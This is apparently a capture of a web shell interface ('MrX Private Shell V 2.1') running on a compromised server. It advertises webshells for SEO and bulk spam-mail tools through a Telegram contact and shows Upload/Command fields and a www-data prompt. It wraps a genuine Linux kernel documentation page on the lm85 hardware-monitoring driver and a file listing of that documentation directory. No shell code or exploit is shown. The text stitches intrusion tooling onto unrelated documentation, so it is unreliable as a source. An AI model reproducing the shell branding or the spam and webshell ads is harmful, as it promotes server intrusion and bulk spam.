__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.139: ~ $
<!DOCTYPE html>

<html lang="en" data-content_root="../">
  <head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />

    <title>Kernel driver lm85 &#8212; The Linux Kernel  documentation</title>
    <link rel="stylesheet" type="text/css" href="../_static/pygments.css?v=fa44fd50" />
    <link rel="stylesheet" type="text/css" href="../_static/alabaster.css?v=3918102e" />
    <script src="../_static/documentation_options.js?v=5929fcd5"></script>
    <script src="../_static/doctools.js?v=9bcbadda"></script>
    <script src="../_static/sphinx_highlight.js?v=dc90522c"></script>
    <link rel="index" title="Index" href="../genindex.html" />
    <link rel="search" title="Search" href="../search.html" />
    <link rel="next" title="Kernel driver lm87" href="lm87.html" />
    <link rel="prev" title="Kernel driver lm83" href="lm83.html" />
   
  <link rel="stylesheet" href="../_static/custom.css" type="text/css" />
  

  
  

  </head><body>
  <div class="document">
    
      <div class="sphinxsidebar" role="navigation" aria-label="Main">
        <div class="sphinxsidebarwrapper">
            <p class="logo"><a href="../index.html">
              <img class="logo" src="../_static/logo.svg" alt="Logo of The Linux Kernel"/>
            </a></p>
<h1 class="logo"><a href="../index.html">The Linux Kernel</a></h1>



<p class="blurb">6.18.50</p>







<search id="searchbox" style="display: none" role="search">
  <h3 id="searchlabel">Quick search</h3>
    <div class="searchformwrapper">
    <form class="search" action="../search.html" method="get">
      <input type="text" name="q" aria-labelledby="searchlabel" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false"/>
      <input type="submit" value="Go" />
    </form>
    </div>
</search>
<script>document.getElementById('searchbox').style.display = "block"</script>


<p>
<h3 class="kernel-toc-contents">Contents</h3>
<input type="checkbox" class="kernel-toc-toggle" id = "kernel-toc-toggle" checked>
<label class="kernel-toc-title" for="kernel-toc-toggle"></label>

<div class="kerneltoc" id="kerneltoc">
<ul>
<li class="toctree-l1"><a class="reference internal" href="../process/development-process.html">Development process</a></li>
<li class="toctree-l1"><a class="reference internal" href="../process/submitting-patches.html">Submitting patches</a></li>
<li class="toctree-l1"><a class="reference internal" href="../process/code-of-conduct.html">Code of conduct</a></li>
<li class="toctree-l1"><a class="reference internal" href="../maintainer/index.html">Maintainer handbook</a></li>
<li class="toctree-l1"><a class="reference internal" href="../process/index.html">All development-process docs</a></li>
</ul>
<ul class="current">
<li class="toctree-l1"><a class="reference internal" href="../core-api/index.html">Core API</a></li>
<li class="toctree-l1"><a class="reference internal" href="../driver-api/index.html">Driver APIs</a></li>
<li class="toctree-l1 current"><a class="reference internal" href="../subsystem-apis.html">Subsystems</a><ul class="current">
<li class="toctree-l2"><a class="reference internal" href="../subsystem-apis.html#core-subsystems">Core subsystems</a></li>
<li class="toctree-l2"><a class="reference internal" href="../subsystem-apis.html#human-interfaces">Human interfaces</a></li>
<li class="toctree-l2"><a class="reference internal" href="../subsystem-apis.html#networking-interfaces">Networking interfaces</a></li>
<li class="toctree-l2"><a class="reference internal" href="../subsystem-apis.html#storage-interfaces">Storage interfaces</a></li>
<li class="toctree-l2 current"><a class="reference internal" href="../subsystem-apis.html#other-subsystems">Other subsystems</a><ul class="current">
<li class="toctree-l3"><a class="reference internal" href="../accounting/index.html">Accounting</a></li>
<li class="toctree-l3"><a class="reference internal" href="../cpu-freq/index.html">CPUFreq - CPU frequency and voltage scaling code in the Linux(TM) kernel</a></li>
<li class="toctree-l3"><a class="reference internal" href="../edac/index.html">EDAC Subsystem</a></li>
<li class="toctree-l3"><a class="reference internal" href="../fpga/index.html">FPGA</a></li>
<li class="toctree-l3"><a class="reference internal" href="../i2c/index.html">I2C/SMBus Subsystem</a></li>
<li class="toctree-l3"><a class="reference internal" href="../iio/index.html">Industrial I/O</a></li>
<li class="toctree-l3"><a class="reference internal" href="../pcmcia/index.html">PCMCIA</a></li>
<li class="toctree-l3"><a class="reference internal" href="../spi/index.html">Serial Peripheral Interface (SPI)</a></li>
<li class="toctree-l3"><a class="reference internal" href="../w1/index.html">1-Wire Subsystem</a></li>
<li class="toctree-l3"><a class="reference internal" href="../watchdog/index.html">Watchdog Support</a></li>
<li class="toctree-l3"><a class="reference internal" href="../virt/index.html">Virtualization Support</a></li>
<li class="toctree-l3 current"><a class="reference internal" href="index.html">Hardware Monitoring</a></li>
<li class="toctree-l3"><a class="reference internal" href="../accel/index.html">Compute Accelerators</a></li>
<li class="toctree-l3"><a class="reference internal" href="../security/index.html">Security Documentation</a></li>
<li class="toctree-l3"><a class="reference internal" href="../crypto/index.html">Crypto API</a></li>
<li class="toctree-l3"><a class="reference internal" href="../bpf/index.html">BPF Documentation</a></li>
<li class="toctree-l3"><a class="reference internal" href="../usb/index.html">USB support</a></li>
<li class="toctree-l3"><a class="reference internal" href="../PCI/index.html">PCI Bus Subsystem</a></li>
<li class="toctree-l3"><a class="reference internal" href="../misc-devices/index.html">Assorted Miscellaneous Devices Documentation</a></li>
<li class="toctree-l3"><a class="reference internal" href="../peci/index.html">PECI Subsystem</a></li>
<li class="toctree-l3"><a class="reference internal" href="../wmi/index.html">WMI Subsystem</a></li>
<li class="toctree-l3"><a class="reference internal" href="../tee/index.html">TEE Subsystem</a></li>
</ul>
</li>
</ul>
</li>
<li class="toctree-l1"><a class="reference internal" href="../locking/index.html">Locking</a></li>
</ul>
<ul>
<li class="toctree-l1"><a class="reference internal" href="../process/license-rules.html">Licensing rules</a></li>
<li class="toctree-l1"><a class="reference internal" href="../doc-guide/index.html">Writing documentation</a></li>
<li class="toctree-l1"><a class="reference internal" href="../dev-tools/index.html">Development tools</a></li>
<li class="toctree-l1"><a class="reference internal" href="../dev-tools/testing-overview.html">Testing guide</a></li>
<li class="toctree-l1"><a class="reference internal" href="../kernel-hacking/index.html">Hacking guide</a></li>
<li class="toctree-l1"><a class="reference internal" href="../trace/index.html">Tracing</a></li>
<li class="toctree-l1"><a class="reference internal" href="../fault-injection/index.html">Fault injection</a></li>
<li class="toctree-l1"><a class="reference internal" href="../livepatch/index.html">Livepatching</a></li>
<li class="toctree-l1"><a class="reference internal" href="../rust/index.html">Rust</a></li>
</ul>
<ul>
<li class="toctree-l1"><a class="reference internal" href="../admin-guide/index.html">Administration</a></li>
<li class="toctree-l1"><a class="reference internal" href="../kbuild/index.html">Build system</a></li>
<li class="toctree-l1"><a class="reference internal" href="../admin-guide/reporting-issues.html">Reporting issues</a></li>
<li class="toctree-l1"><a class="reference internal" href="../tools/index.html">Userspace tools</a></li>
<li class="toctree-l1"><a class="reference internal" href="../userspace-api/index.html">Userspace API</a></li>
</ul>
<ul>
<li class="toctree-l1"><a class="reference internal" href="../firmware-guide/index.html">Firmware</a></li>
<li class="toctree-l1"><a class="reference internal" href="../devicetree/index.html">Firmware and Devicetree</a></li>
</ul>
<ul>
<li class="toctree-l1"><a class="reference internal" href="../arch/index.html">CPU architectures</a></li>
</ul>
<ul>
<li class="toctree-l1"><a class="reference internal" href="../staging/index.html">Unsorted documentation</a></li>
</ul>
<ul>
<li class="toctree-l1"><a class="reference internal" href="../translations/index.html">Translations</a></li>
</ul>

</div>

<script type="text/javascript"> <!--
  var sbar = document.getElementsByClassName("sphinxsidebar")[0];
  let currents = document.getElementsByClassName("current")
  if (currents.length) {
    sbar.scrollTop = currents[currents.length - 1].offsetTop;
  }
  --> </script>
  <div role="note" aria-label="source link">
    <h3>This Page</h3>
    <ul class="this-page-menu">
      <li><a href="../_sources/hwmon/lm85.rst.txt"
            rel="nofollow">Show Source</a></li>
    </ul>
   </div>
        </div>
      </div>
      <div class="documentwrapper">
        <div class="bodywrapper">
          

          <div class="body" role="main">
            
  



<section id="kernel-driver-lm85">
<h1>Kernel driver lm85<a class="headerlink" href="#kernel-driver-lm85" title="Link to this heading">¶</a></h1>
<p>Supported chips:</p>
<blockquote>
<div><ul>
<li><p>National Semiconductor LM85 (B and C versions)</p>
<p>Prefix: ‘lm85b’ or ‘lm85c’</p>
<p>Addresses scanned: I2C 0x2c, 0x2d, 0x2e</p>
<p>Datasheet: <a class="reference external" href="http://www.national.com/pf/LM/LM85.html">http://www.national.com/pf/LM/LM85.html</a></p>
</li>
<li><p>Texas Instruments LM96000</p>
<p>Prefix: ‘lm9600’</p>
<p>Addresses scanned: I2C 0x2c, 0x2d, 0x2e</p>
<p>Datasheet: <a class="reference external" href="https://www.ti.com/lit/ds/symlink/lm96000.pdf">https://www.ti.com/lit/ds/symlink/lm96000.pdf</a></p>
</li>
<li><p>Analog Devices ADM1027</p>
<p>Prefix: ‘adm1027’</p>
<p>Addresses scanned: I2C 0x2c, 0x2d, 0x2e</p>
<p>Datasheet: <a class="reference external" href="https://www.onsemi.com/PowerSolutions/product.do?id=ADM1027">https://www.onsemi.com/PowerSolutions/product.do?id=ADM1027</a></p>
</li>
<li><p>Analog Devices ADT7463</p>
<p>Prefix: ‘adt7463’</p>
<p>Addresses scanned: I2C 0x2c, 0x2d, 0x2e</p>
<p>Datasheet: <a class="reference external" href="https://www.onsemi.com/PowerSolutions/product.do?id=ADT7463">https://www.onsemi.com/PowerSolutions/product.do?id=ADT7463</a></p>
</li>
<li><p>Analog Devices ADT7468</p>
<p>Prefix: ‘adt7468’</p>
<p>Addresses scanned: I2C 0x2c, 0x2d, 0x2e</p>
<p>Datasheet: <a class="reference external" href="https://www.onsemi.com/PowerSolutions/product.do?id=ADT7468">https://www.onsemi.com/PowerSolutions/product.do?id=ADT7468</a></p>
</li>
<li><p>SMSC EMC6D100, SMSC EMC6D101</p>
<p>Prefix: ‘emc6d100’</p>
<p>Addresses scanned: I2C 0x2c, 0x2d, 0x2e</p>
<p>Datasheet: <a class="reference external" href="http://www.smsc.com/media/Downloads_Public/discontinued/6d100.pdf">http://www.smsc.com/media/Downloads_Public/discontinued/6d100.pdf</a></p>
</li>
<li><p>SMSC EMC6D102</p>
<p>Prefix: ‘emc6d102’</p>
<p>Addresses scanned: I2C 0x2c, 0x2d, 0x2e</p>
<p>Datasheet: <a class="reference external" href="http://www.smsc.com/main/catalog/emc6d102.html">http://www.smsc.com/main/catalog/emc6d102.html</a></p>
</li>
<li><p>SMSC EMC6D103</p>
<p>Prefix: ‘emc6d103’</p>
<p>Addresses scanned: I2C 0x2c, 0x2d, 0x2e</p>
<p>Datasheet: <a class="reference external" href="http://www.smsc.com/main/catalog/emc6d103.html">http://www.smsc.com/main/catalog/emc6d103.html</a></p>
</li>
<li><p>SMSC EMC6D103S</p>
<p>Prefix: ‘emc6d103s’</p>
<p>Addresses scanned: I2C 0x2c, 0x2d, 0x2e</p>
<p>Datasheet: <a class="reference external" href="http://www.smsc.com/main/catalog/emc6d103s.html">http://www.smsc.com/main/catalog/emc6d103s.html</a></p>
</li>
</ul>
</div></blockquote>
<dl class="simple">
<dt>Authors:</dt><dd><ul class="simple">
<li><p>Philip Pokorny &lt;<a class="reference external" href="mailto:ppokorny&#37;&#52;&#48;penguincomputing&#46;com">ppokorny<span>&#64;</span>penguincomputing<span>&#46;</span>com</a>&gt;,</p></li>
<li><p>Frodo Looijaard &lt;<a class="reference external" href="mailto:frodol&#37;&#52;&#48;dds&#46;nl">frodol<span>&#64;</span>dds<span>&#46;</span>nl</a>&gt;,</p></li>
<li><p>Richard Barrington &lt;<a class="reference external" href="mailto:rich_b_nz&#37;&#52;&#48;clear&#46;net&#46;nz">rich_b_nz<span>&#64;</span>clear<span>&#46;</span>net<span>&#46;</span>nz</a>&gt;,</p></li>
<li><p>Margit Schubert-While &lt;<a class="reference external" href="mailto:margitsw&#37;&#52;&#48;t-online&#46;de">margitsw<span>&#64;</span>t-online<span>&#46;</span>de</a>&gt;,</p></li>
<li><p>Justin Thiessen &lt;<a class="reference external" href="mailto:jthiessen&#37;&#52;&#48;penguincomputing&#46;com">jthiessen<span>&#64;</span>penguincomputing<span>&#46;</span>com</a>&gt;</p></li>
</ul>
</dd>
</dl>
<section id="description">
<h2>Description<a class="headerlink" href="#description" title="Link to this heading">¶</a></h2>
<p>This driver implements support for the National Semiconductor LM85 and
compatible chips including the Analog Devices ADM1027, ADT7463, ADT7468 and
SMSC EMC6D10x chips family.</p>
<p>The LM85 uses the 2-wire interface compatible with the SMBUS 2.0
specification. Using an analog to digital converter it measures three (3)
temperatures and five (5) voltages. It has four (4) 16-bit counters for
measuring fan speed. Five (5) digital inputs are provided for sampling the
VID signals from the processor to the VRM. Lastly, there are three (3) PWM
outputs that can be used to control fan speed.</p>
<p>The voltage inputs have internal scaling resistors so that the following
voltage can be measured without external resistors:</p>
<blockquote>
<div><p>2.5V, 3.3V, 5V, 12V, and CPU core voltage (2.25V)</p>
</div></blockquote>
<p>The temperatures measured are one internal diode, and two remote diodes.
Remote 1 is generally the CPU temperature. These inputs are designed to
measure a thermal diode like the one in a Pentium 4 processor in a socket
423 or socket 478 package. They can also measure temperature using a
transistor like the 2N3904.</p>
<p>A sophisticated control system for the PWM outputs is designed into the
LM85 that allows fan speed to be adjusted automatically based on any of the
three temperature sensors. Each PWM output is individually adjustable and
programmable. Once configured, the LM85 will adjust the PWM outputs in
response to the measured temperatures without further host intervention.
This feature can also be disabled for manual control of the PWM’s.</p>
<p>Each of the measured inputs (voltage, temperature, fan speed) has
corresponding high/low limit values. The LM85 will signal an ALARM if any
measured value exceeds either limit.</p>
<p>The LM85 samples all inputs continuously. The lm85 driver will not read
the registers more often than once a second. Further, configuration data is
only read once each 5 minutes. There is twice as much config data as
measurements, so this would seem to be a worthwhile optimization.</p>
</section>
<section id="special-features">
<h2>Special Features<a class="headerlink" href="#special-features" title="Link to this heading">¶</a></h2>
<p>The LM85 has four fan speed monitoring modes. The ADM1027 has only two.
Both have special circuitry to compensate for PWM interactions with the
TACH signal from the fans. The ADM1027 can be configured to measure the
speed of a two wire fan, but the input conditioning circuitry is different
for 3-wire and 2-wire mode. For this reason, the 2-wire fan modes are not
exposed to user control. The BIOS should initialize them to the correct
mode. If you’ve designed your own ADM1027, you’ll have to modify the
init_client function and add an insmod parameter to set this up.</p>
<p>To smooth the response of fans to changes in temperature, the LM85 has an
optional filter for smoothing temperatures. The ADM1027 has the same
config option but uses it to rate limit the changes to fan speed instead.</p>
<p>The ADM1027, ADT7463 and ADT7468 have a 10-bit ADC and can therefore
measure temperatures with 0.25 degC resolution. They also provide an offset
to the temperature readings that is automatically applied during
measurement. This offset can be used to zero out any errors due to traces
and placement. The documentation says that the offset is in 0.25 degC
steps, but in initial testing of the ADM1027 it was 1.00 degC steps. Analog
Devices has confirmed this “bug”. The ADT7463 is reported to work as
described in the documentation. The current lm85 driver does not show the
offset register.</p>
<p>The ADT7468 has a high-frequency PWM mode, where all PWM outputs are
driven by a 22.5 kHz clock. This is a global mode, not per-PWM output,
which means that setting any PWM frequency above 11.3 kHz will switch
all 3 PWM outputs to a 22.5 kHz frequency. Conversely, setting any PWM
frequency below 11.3 kHz will switch all 3 PWM outputs to a frequency
between 10 and 100 Hz, which can then be tuned separately.</p>
<p>See the vendor datasheets for more information. There is application note
from National (AN-1260) with some additional information about the LM85.
The Analog Devices datasheet is very detailed and describes a procedure for
determining an optimal configuration for the automatic PWM control.</p>
<p>The SMSC EMC6D100 &amp; EMC6D101 monitor external voltages, temperatures, and
fan speeds. They use this monitoring capability to alert the system to out
of limit conditions and can automatically control the speeds of multiple
fans in a PC or embedded system. The EMC6D101, available in a 24-pin SSOP
package, and the EMC6D100, available in a 28-pin SSOP package, are designed
to be register compatible. The EMC6D100 offers all the features of the
EMC6D101 plus additional voltage monitoring and system control features.
Unfortunately it is not possible to distinguish between the package
versions on register level so these additional voltage inputs may read
zero. EMC6D102 and EMC6D103 feature additional ADC bits thus extending precision
of voltage and temperature channels.</p>
<p>SMSC EMC6D103S is similar to EMC6D103, but does not support pwm#_auto_pwm_minctl
and temp#_auto_temp_off.</p>
<p>The LM96000 supports additional high frequency PWM modes (22.5 kHz, 24 kHz,
25.7 kHz, 27.7 kHz and 30 kHz), which can be configured on a per-PWM basis.</p>
</section>
<section id="hardware-configurations">
<h2>Hardware Configurations<a class="headerlink" href="#hardware-configurations" title="Link to this heading">¶</a></h2>
<p>The LM85 can be jumpered for 3 different SMBus addresses. There are
no other hardware configuration options for the LM85.</p>
<p>The lm85 driver detects both LM85B and LM85C revisions of the chip. See the
datasheet for a complete description of the differences. Other than
identifying the chip, the driver behaves no differently with regard to
these two chips. The LM85B is recommended for new designs.</p>
<p>The ADM1027, ADT7463 and ADT7468 chips have an optional SMBALERT output
that can be used to signal the chipset in case a limit is exceeded or the
temperature sensors fail. Individual sensor interrupts can be masked so
they won’t trigger SMBALERT. The SMBALERT output if configured replaces one
of the other functions (PWM2 or IN0). This functionality is not implemented
in current driver.</p>
<p>The ADT7463 and ADT7468 also have an optional THERM output/input which can
be connected to the processor PROC_HOT output. If available, the autofan
control dynamic Tmin feature can be enabled to keep the system temperature
within spec (just?!) with the least possible fan noise.</p>
</section>
<section id="configuration-notes">
<h2>Configuration Notes<a class="headerlink" href="#configuration-notes" title="Link to this heading">¶</a></h2>
<p>Besides standard interfaces driver adds following:</p>
<ul class="simple">
<li><p>Temperatures and Zones</p></li>
</ul>
<p>Each temperature sensor is associated with a Zone. There are three
sensors and therefore three zones (# 1, 2 and 3). Each zone has the following
temperature configuration points:</p>
<ul class="simple">
<li><dl class="simple">
<dt>temp#_auto_temp_off</dt><dd><ul>
<li><p>temperature below which fans should be off or spinning very low.</p></li>
</ul>
</dd>
</dl>
</li>
<li><dl class="simple">
<dt>temp#_auto_temp_min</dt><dd><ul>
<li><p>temperature over which fans start to spin.</p></li>
</ul>
</dd>
</dl>
</li>
<li><dl class="simple">
<dt>temp#_auto_temp_max</dt><dd><ul>
<li><p>temperature when fans spin at full speed.</p></li>
</ul>
</dd>
</dl>
</li>
<li><dl class="simple">
<dt>temp#_auto_temp_crit</dt><dd><ul>
<li><p>temperature when all fans will run full speed.</p></li>
</ul>
</dd>
</dl>
</li>
</ul>
<section id="pwm-control">
<h3>PWM Control<a class="headerlink" href="#pwm-control" title="Link to this heading">¶</a></h3>
<p>There are three PWM outputs. The LM85 datasheet suggests that the
pwm3 output control both fan3 and fan4. Each PWM can be individually
configured and assigned to a zone for its control value. Each PWM can be
configured individually according to the following options.</p>
<ul class="simple">
<li><dl class="simple">
<dt>pwm#_auto_pwm_min</dt><dd><ul>
<li><p>this specifies the PWM value for temp#_auto_temp_off
temperature. (PWM value from 0 to 255)</p></li>
</ul>
</dd>
</dl>
</li>
<li><dl class="simple">
<dt>pwm#_auto_pwm_minctl</dt><dd><ul>
<li><p>this flags selects for temp#_auto_temp_off temperature
the behaviour of fans. Write 1 to let fans spinning at
pwm#_auto_pwm_min or write 0 to let them off.</p></li>
</ul>
</dd>
</dl>
</li>
</ul>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>It has been reported that there is a bug in the LM85 that causes
the flag to be associated with the zones not the PWMs. This
contradicts all the published documentation. Setting pwm#_min_ctl
in this case actually affects all PWMs controlled by zone ‘#’.</p>
</div>
</section>
<section id="pwm-controlling-zone-selection">
<h3>PWM Controlling Zone selection<a class="headerlink" href="#pwm-controlling-zone-selection" title="Link to this heading">¶</a></h3>
<ul class="simple">
<li><dl class="simple">
<dt>pwm#_auto_channels</dt><dd><ul>
<li><p>controls zone that is associated with PWM</p></li>
</ul>
</dd>
</dl>
</li>
</ul>
<p>Configuration choices:</p>
<table class="docutils align-default">
<thead>
<tr class="row-odd"><th class="head"><p>Value</p></th>
<th class="head"><p>Meaning</p></th>
</tr>
</thead>
<tbody>
<tr class="row-even"><td><p>1</p></td>
<td><p>Controlled by Zone 1</p></td>
</tr>
<tr class="row-odd"><td><p>2</p></td>
<td><p>Controlled by Zone 2</p></td>
</tr>
<tr class="row-even"><td><p>3</p></td>
<td><p>Controlled by Zone 3</p></td>
</tr>
<tr class="row-odd"><td><p>23</p></td>
<td><p>Controlled by higher temp of Zone 2 or 3</p></td>
</tr>
<tr class="row-even"><td><p>123</p></td>
<td><p>Controlled by highest temp of Zone 1, 2 or 3</p></td>
</tr>
<tr class="row-odd"><td><p>0</p></td>
<td><p>PWM always 0%  (off)</p></td>
</tr>
<tr class="row-even"><td><p>-1</p></td>
<td><p>PWM always 100%  (full on)</p></td>
</tr>
<tr class="row-odd"><td><p>-2</p></td>
<td><p>Manual control (write to ‘pwm#’ to set)</p></td>
</tr>
</tbody>
</table>
<p>The National LM85’s have two vendor specific configuration
features. Tach. mode and Spinup Control. For more details on these,
see the LM85 datasheet or Application Note AN-1260. These features
are not currently supported by the lm85 driver.</p>
<p>The Analog Devices ADM1027 has several vendor specific enhancements.
The number of pulses-per-rev of the fans can be set, Tach monitoring
can be optimized for PWM operation, and an offset can be applied to
the temperatures to compensate for systemic errors in the
measurements. These features are not currently supported by the lm85
driver.</p>
<p>In addition to the ADM1027 features, the ADT7463 and ADT7468 also have
Tmin control and THERM asserted counts. Automatic Tmin control acts to
adjust the Tmin value to maintain the measured temperature sensor at a
specified temperature. There isn’t much documentation on this feature in
the ADT7463 data sheet. This is not supported by current driver.</p>
</section>
</section>
</section>


          </div>
          
        </div>
      </div>
    <div class="clearer"></div>
  </div>
    <div class="footer">
      &#169;The kernel development community.
      
      |
      Powered by <a href="https://www.sphinx-doc.org/">Sphinx 8.1.3</a>
      &amp; <a href="https://alabaster.readthedocs.io">Alabaster 0.7.16</a>
      
      |
      <a href="../_sources/hwmon/lm85.rst.txt"
          rel="nofollow">Page source</a>
    </div>

    

    
  </body>
</html>

Filemanager

Name Type Size Permission Actions
abituguru-datasheet.html File 26.68 KB 0644
abituguru.html File 15.9 KB 0644
abituguru3.html File 13.22 KB 0644
acbel-fsg032.html File 15.21 KB 0644
acpi_power_meter.html File 13.5 KB 0644
ad7314.html File 10.6 KB 0644
adc128d818.html File 11.87 KB 0644
adm1025.html File 12.58 KB 0644
adm1026.html File 15.18 KB 0644
adm1031.html File 11.54 KB 0644
adm1177.html File 11.3 KB 0644
adm1266.html File 11.3 KB 0644
adm1275.html File 17.55 KB 0644
adm9240.html File 20.36 KB 0644
adp1050.html File 17.63 KB 0644
ads7828.html File 13.04 KB 0644
adt7410.html File 14.54 KB 0644
adt7411.html File 11.78 KB 0644
adt7462.html File 12.64 KB 0644
adt7470.html File 13.41 KB 0644
adt7475.html File 16.93 KB 0644
aht10.html File 12.57 KB 0644
amc6821.html File 16.08 KB 0644
aquacomputer_d5next.html File 16.03 KB 0644
asb100.html File 13.39 KB 0644
asc7621.html File 24.1 KB 0644
aspeed-g6-pwm-tach.html File 10.78 KB 0644
aspeed-pwm-tacho.html File 10.78 KB 0644
asus_ec_sensors.html File 13.52 KB 0644
asus_rog_ryujin.html File 12.03 KB 0644
asus_wmi_sensors.html File 12.89 KB 0644
bcm54140.html File 11.91 KB 0644
bel-pfe.html File 15.42 KB 0644
bpa-rs600.html File 14.13 KB 0644
bt1-pvt.html File 16.6 KB 0644
cgbc-hwmon.html File 13.48 KB 0644
chipcap2.html File 13.5 KB 0644
coretemp.html File 16.79 KB 0644
corsair-cpro.html File 12 KB 0644
corsair-psu.html File 14.95 KB 0644
cros_ec_hwmon.html File 10.88 KB 0644
crps.html File 15.73 KB 0644
da9052.html File 13.36 KB 0644
da9055.html File 12.06 KB 0644
dell-smm-hwmon.html File 36.04 KB 0644
dme1737.html File 29.23 KB 0644
dps920ab.html File 13.39 KB 0644
drivetemp.html File 12.77 KB 0644
ds1621.html File 19.05 KB 0644
ds620.html File 11.6 KB 0644
emc1403.html File 14.21 KB 0644
emc2103.html File 11.24 KB 0644
emc2305.html File 11.53 KB 0644
emc6w201.html File 11.42 KB 0644
f71805f.html File 20.18 KB 0644
f71882fg.html File 16.01 KB 0644
fam15h_power.html File 14.9 KB 0644
fsp-3y.html File 10.98 KB 0644
ftsteutates.html File 11.64 KB 0644
g760a.html File 11.34 KB 0644
g762.html File 13.02 KB 0644
gigabyte_waterforce.html File 11.62 KB 0644
gl518sm.html File 13.75 KB 0644
gpd-fan.html File 12.9 KB 0644
gsc-hwmon.html File 11.98 KB 0644
gxp-fan-ctrl.html File 10.83 KB 0644
hih6130.html File 11.49 KB 0644
hp-wmi-sensors.html File 24.2 KB 0644
hs3001.html File 11.22 KB 0644
htu31.html File 11.07 KB 0644
hwmon-kernel-api.html File 28.79 KB 0644
ibm-cffps.html File 13.18 KB 0644
ibmaem.html File 11.37 KB 0644
ibmpowernv.html File 14.41 KB 0644
ina209.html File 16.13 KB 0644
ina233.html File 11.77 KB 0644
ina238.html File 14.77 KB 0644
ina2xx.html File 17.9 KB 0644
ina3221.html File 13.69 KB 0644
index.html File 37.21 KB 0644
inspur-ipsps1.html File 14.74 KB 0644
intel-m10-bmc-hwmon.html File 14.19 KB 0644
ir35221.html File 15.37 KB 0644
ir36021.html File 12.94 KB 0644
ir38064.html File 15.22 KB 0644
isl28022.html File 12.44 KB 0644
isl68137.html File 33.94 KB 0644
it87.html File 24.03 KB 0644
jc42.html File 17.9 KB 0644
k10temp.html File 16.25 KB 0644
k8temp.html File 12.42 KB 0644
kbatt.html File 12.63 KB 0644
kfan.html File 11.48 KB 0644
lan966x.html File 11.02 KB 0644
lineage-pem.html File 13.77 KB 0644
lm25066.html File 16.43 KB 0644
lm63.html File 13.88 KB 0644
lm70.html File 12.7 KB 0644
lm73.html File 13.67 KB 0644
lm75.html File 17.08 KB 0644
lm77.html File 11.65 KB 0644
lm78.html File 13.54 KB 0644
lm80.html File 13.16 KB 0644
lm83.html File 14.24 KB 0644
lm85.html File 24.3 KB 0644
lm87.html File 14.23 KB 0644
lm90.html File 34.77 KB 0644
lm92.html File 11.65 KB 0644
lm93.html File 28.68 KB 0644
lm95234.html File 11.89 KB 0644
lm95245.html File 11.91 KB 0644
lochnagar.html File 16.38 KB 0644
lt3074.html File 13.86 KB 0644
lt7182s.html File 15.07 KB 0644
ltc2945.html File 15.06 KB 0644
ltc2947.html File 16.58 KB 0644
ltc2978.html File 28.01 KB 0644
ltc2990.html File 12.56 KB 0644
ltc2991.html File 11.45 KB 0644
ltc2992.html File 12.07 KB 0644
ltc3815.html File 13.16 KB 0644
ltc4151.html File 11.71 KB 0644
ltc4215.html File 12.15 KB 0644
ltc4245.html File 15.68 KB 0644
ltc4260.html File 12.48 KB 0644
ltc4261.html File 13 KB 0644
ltc4282.html File 18.76 KB 0644
ltc4286.html File 14.5 KB 0644
max127.html File 11.59 KB 0644
max15301.html File 14.49 KB 0644
max16064.html File 13.91 KB 0644
max16065.html File 15 KB 0644
max1619.html File 10.96 KB 0644
max16601.html File 16.95 KB 0644
max1668.html File 14.54 KB 0644
max197.html File 13.01 KB 0644
max20730.html File 13.58 KB 0644
max20751.html File 14.47 KB 0644
max31722.html File 11.4 KB 0644
max31730.html File 12.02 KB 0644
max31760.html File 14.62 KB 0644
max31785.html File 13.5 KB 0644
max31790.html File 11.95 KB 0644
max31827.html File 16.18 KB 0644
max34440.html File 20.08 KB 0644
max6620.html File 12.25 KB 0644
max6639.html File 13.79 KB 0644
max6650.html File 13.6 KB 0644
max6697.html File 13.71 KB 0644
max77705.html File 11.3 KB 0644
max8688.html File 14.73 KB 0644
mc13783-adc.html File 16.1 KB 0644
mc33xs2410_hwmon.html File 11.34 KB 0644
mc34vr500.html File 10.93 KB 0644
mcp3021.html File 11.22 KB 0644
menf21bmc.html File 12.3 KB 0644
mlxreg-fan.html File 13.61 KB 0644
mp2856.html File 12.53 KB 0644
mp2869.html File 13.21 KB 0644
mp2888.html File 12.85 KB 0644
mp2891.html File 13.56 KB 0644
mp29502.html File 11.78 KB 0644
mp2975.html File 13.89 KB 0644
mp2993.html File 13.09 KB 0644
mp5023.html File 11.76 KB 0644
mp5920.html File 12 KB 0644
mp5990.html File 12.21 KB 0644
mp9941.html File 12.04 KB 0644
mpq8785.html File 13.29 KB 0644
nct6683.html File 13.44 KB 0644
nct6775.html File 20.68 KB 0644
nct7363.html File 10.92 KB 0644
nct7802.html File 11.09 KB 0644
nct7904.html File 12.28 KB 0644
npcm750-pwm-fan.html File 10.81 KB 0644
nsa320.html File 12.52 KB 0644
ntc_thermistor.html File 13.62 KB 0644
nzxt-kraken2.html File 11.3 KB 0644
nzxt-kraken3.html File 13.52 KB 0644
nzxt-smart2.html File 12.82 KB 0644
occ.html File 15.87 KB 0644
pc87360.html File 19.92 KB 0644
pc87427.html File 12.16 KB 0644
pcf8591.html File 14.52 KB 0644
peci-cputemp.html File 14.53 KB 0644
peci-dimmtemp.html File 12.32 KB 0644
pim4328.html File 13.98 KB 0644
pli1209bc.html File 14.36 KB 0644
pm6764tr.html File 11.08 KB 0644
pmbus-core.html File 30.88 KB 0644
pmbus.html File 22.6 KB 0644
powerz.html File 10.62 KB 0644
powr1220.html File 12.13 KB 0644
pt5161l.html File 11.44 KB 0644
pwm-fan.html File 11.32 KB 0644
pxe1610.html File 14.53 KB 0644
q54sj108a2.html File 12.59 KB 0644
qnap-mcu-hwmon.html File 10.93 KB 0644
raspberrypi-hwmon.html File 10.78 KB 0644
